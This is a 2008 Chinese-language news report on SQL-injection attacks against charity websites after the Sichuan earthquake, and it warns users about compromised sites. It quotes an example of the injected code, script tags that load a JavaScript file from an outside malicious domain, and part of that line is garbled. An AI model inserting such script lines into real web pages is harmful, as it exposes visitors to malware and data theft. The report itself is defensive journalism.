资讯安全再陷危机 慈善团体网站受害最甚 隐码攻击为主因

【2008年5月21日讯】

四川大地震衍伸出的问题,在各领域上屡见不鲜,不只观光业,就连救灾、慈善相关的网站,近期也被骇客锁定为主要的攻击目标,当中,“SQL隐码攻击”是主要关键。

趋势科技指出,因为四川大地震的关系,使得众多慈善团体的网站,点阅率大幅提升,也大幅增加犯罪者植入木马的机会,骇客更利用微软在两年前发布的MS06-14漏洞,进行入侵攻击,一旦使用者连上被入侵的网站,点选外部链接后,其他相关网站也会遭到攻击,目前所知,亚洲地区有近十万以上的网站遭波及。

另外,阿玛科技根据近期受害的亚洲网站进行分析,当中,更指出,只要在大型搜寻引擎,输入骇客指令的关键字,就可以看到众多网站会被植入包含“<script>”的程式语法,范例如下:

<script src=http:/<script src=http://9i5t.cn/a.js></script> <script src=http://9i5t.cn/a.js></script>

此类攻击手段,是骇客先入侵伺服器端,找到注入点,之后让受害的网站,在无意间与骇客端连结,而当使用者连上线后,个人资料随即遭到骇客的窃取,造成个资外泄的严重问题。

虽然受害的网站已有部分修复完毕,但台湾资安产业已发出警示,提醒使用者搜寻网站时,除了注意安全警示标与外,并尽量不要连入库存网站页面,以免遭受攻击。

消息来源

外部链接